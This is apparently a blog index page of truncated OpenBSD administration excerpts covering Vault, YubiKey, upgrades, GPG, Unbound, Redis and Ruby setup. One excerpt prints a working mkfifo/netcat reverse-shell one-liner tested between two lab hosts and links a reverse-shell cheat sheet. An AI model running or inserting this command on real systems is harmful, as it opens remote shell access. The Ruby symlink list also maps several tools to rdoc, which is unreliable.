how to Install and run Hashicorp Vault on OpenBSD in addition to [https://blog.stoege.net/categories/vault/](this Blog Entry), here some instructions for OpenBSD.
Requirements VM with OpenBSD 7.2 (or older …) and root/doas permission Domain, or at least a FQDN Name pointing to your VM HTTP/HTTPS allowed from Internet (for Certificate Generation) Nginx installed (pkg_add nginx) Source https://developer.hashicorp.com/vault/docs/get-started/developer-qs
Install Vault all the Steps must be run as root (or with doas)
pkg_add vault Vault Config Backup the prev.
Running YubiKey on OpenBSD buy a Key and give try …
Source https://www.yubico.com/
Install Software pkg_add yubikey-manager-3.1.2p4 pkg_add yubikey-manager-3.1.2p4 quirks-6.42 signed on 2023-01-08T01:39:04Z yubikey-manager-3.1.2p4:py3-click-7.1.2: ok yubikey-manager-3.1.2p4:py3-pyusb-1.0.2p5: ok yubikey-manager-3.1.2p4:pcsc-lite-1.9.8: ok yubikey-manager-3.1.2p4:py3-cparser-2.19p2: ok yubikey-manager-3.1.2p4:py3-cffi-1.15.1: ok yubikey-manager-3.1.2p4:py3-cryptography-38.0.0p0: ok yubikey-manager-3.1.2p4:py3-pyscard-2.0.3: ok yubikey-manager-3.1.2p4:py3-openssl-22.0.0: ok yubikey-manager-3.1.2p4:libyubikey-1.13p4: ok yubikey-manager-3.1.2p4:json-c-0.16: ok yubikey-manager-3.1.2p4:ykpers-1.20.0p2: ok yubikey-manager-3.1.2p4: ok The following new rcscripts were installed: /etc/rc.d/pcscd See rcctl(8) for details. --- +yubikey-manager-3.1.2p4 ------------------- NOTE: yubikey-manager (ykman) is only partially functional on OpenBSD. Most of the "ykman fido xxx" commands (pin-setting and others) stall.
OpenBSD 7.2 finally released. Yesterday, the 53th Relase of OpenBSD got publised, the [Version 7.2)(https://www.openbsd.org/72.html). I’ll upgrade my boxes as usual with the following Script. The most obvious change is the Performance improvement for the Package Mangager, but there is always so more see undeadly
Upgrade Guide As usual, follow to official Upgrade Guide. You can Upgrade with an USB Stick, ISO Image, PXE Boot or inline (from a running system).
GPG and how to use it Create a Key with ECC gpg --expert --full-generate-key (9) ECC and ECC (1) Curve 25519 0 = key does not expire (or whatever you prefer!) Real name: Max Muster Email address: max@muster.net Comment: - pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid Max Muster (-) <max@muster.net> sub cv25519 2022-09-04 [E] Public Key max@host $ gpg /home/max/.gnupg/pubring.kbx ---------------------------- pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid [ultimate] Max Muster (-) <max@muster.
Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Lister on Host A (192.168.1.100)
hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;)
sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3
some cool pages about OpenBSD https://www.openbsd.org https://man.openbsd.org https://www.openbsdfoundation.org https://marc.info https://undeadly.org/cgi?action=front https://bsdly.blogspot.com/ https://obsd.solutions/en/blog/ https://dataswamp.org/~solene/ https://blog.apnic.net/2021/10/28/openbsd-part-1-how-it-all-started/ + https://blog.apnic.net/2021/11/05/openbsd-part-2-why-use-openbsd/ https://vincentdelft.be/category/openbsd http://ratfactor.com/openbsd/2022-08-02-install https://blog.lambda.cx/tags/openbsd/ https://www.openbsdjumpstart.org/#/ https://blog.lambda.cx/posts/openbsd-introduction-talk/openbsd-introduction.pdf https://why-openbsd.rocks/fact/ https://openbsdrouterguide.net/ https://blog.obtusenet.com/ http://kestrel.nmt.edu/~raymond/software/howtos/openbsd.html sha256: a86099a13463c50993ce9fa2d75543daf1888454259f04daab6240c8a6dec7e9
Shutdown Hosts on Power Outages Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that.
Connection UPS to APU via USB Cable dmesg show the UPS connected
APU# dmesg uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ... uhidev0: iclass 3/0, 142 report ids upd0 at uhidev0 uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1 uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1 .
Intro I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines.
how to build json from cli we all like json, do we ? https://kellyjonbrazil.github.io/jc/docs/parsers/ping
add package doas pkg_add jc try ping openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null { "destination_ip": "1.1.1.1", "data_bytes": 56, "pattern": null, "destination": "1.1.1.1", "packets_transmitted": 3, "packets_received": 3, "packet_loss_percent": 0.0, "duplicates": 0, "round_trip_ms_min": 9.219, "round_trip_ms_avg": 9.826, "round_trip_ms_max": 10.158, "round_trip_ms_stddev": 0.43, "responses": [ { "type": "reply", "bytes": 64, "response_ip": "1.1.1.1", "icmp_seq": 0, "ttl": 59, "time_ms": 10.
Enable Logging for Unbound update unbound.conf /var/unbound/etc/unbound.conf
server: logfile: /log/unbound.log verbosity: 1 log-queries: yes ... create folder/logfile log=/var/unbound/log/unbound.log doas mkdir /var/unbound/log/ touch $log chmod 660 $log chown _unbound:_unbound $log restart service doas rcctl restart unbound tail logfile tail -f /var/unbound/log/unbound.log # tail -f /var/unbound/log/unbound.log [1660208341] unbound[3279:0] notice: init module 0: validator [1660208341] unbound[3279:0] notice: init module 1: iterator [1660208341] unbound[3279:0] info: start of service (unbound 1.15.0). [1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.
How to Enable Remote Control for Unbound Setup Remote Control doas unbound-control-setup $ doas unbound-control-setup setup in directory /var/unbound/etc Generating RSA private key, 3072 bit long modulus ..................................++++ ..................................++++ e is 010001 (0x65537) Generating RSA private key, 3072 bit long modulus ........................................++++ ........................................++++ e is 010001 (0x65537) Signature ok subject=/CN=unbound-control Getting CA Private Key removing artifacts Setup success. Certificates created. Enable in unbound.conf file to use Enable in unbound.conf /var/unbound/etc/unbound.conf
stumpled upon some thing cool, htmlq! It’s like jq, but for HTML.
Installation Rust htmlq need rust. so, let’s install rust first.
doas pkg_add rust Add Link to Path cat << 'EOF' |doas tee -a /etc/profile # Rust/Cargo export PATH=$PATH:/root/.cargo/bin EOF . /etc/profile Install HTMLQ doas cargo install htmlq some Examples Extract Links curl -s https://www.openbsd.org | htmlq --attribute href a |head Example
user@nixbox$ curl -s https://www.openbsd.org | htmlq --attribute href a |head goals.
there are a few Weeks until OpenBSD 7.2 will get released. Anyhow, running current is a good way to get a “preview” what’s in the pipeline and will come soon.
one of the painpoint was update packages on OpenBSD. Not because it was difficult, but it took quite a lot of time. Specially, when you run a bunch of machines in different networks.
Version and Time consumption sysctl kern.version pkg_info |wc -l time pkg_add -Vu OpenBSD 7.
let’s play a bit with Redis. A In-Memory Data Store for Caching, Streaming, Message Broker
https://redis.io/ Install doas rcctl add redis doas rcctl enable redis doas rcclt restart redis Package Summary what did we got installed ?
doas pkg_info -L redis $ doas pkg_info -L redis Information for inst:redis-6.2.7 Files: /etc/rc.d/redis /usr/local/bin/redis-benchmark /usr/local/bin/redis-check-aof /usr/local/bin/redis-check-rdb /usr/local/bin/redis-cli /usr/local/bin/redis-sentinel /usr/local/bin/redis-server /usr/local/share/examples/redis/redis.conf /usr/local/share/examples/redis/sentinel.conf A Server, a Client, a configuration File, …
Keep Alive send a ping …
https://github.com/Bratela/openbsd
Install Ruby Install Ruby and set Symlinks
doas su - pkg_add ruby-3.1.2 ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler ln -sf /usr/local/bin/erb31 /usr/local/bin/erb ln -sf /usr/local/bin/gem31 /usr/local/bin/gem ln -sf /usr/local/bin/irb31 /usr/local/bin/irb ln -sf /usr/local/bin/rdoc31 /usr/local/bin/racc ln -sf /usr/local/bin/rake31 /usr/local/bin/rake ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rbs ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdbg ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc ln -sf /usr/local/bin/ri31 /usr/local/bin/ri ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof Install Nokogiri pkg_add ruby31-nokogiri-1.13.1p0 Install Rails pkg_add ruby-3.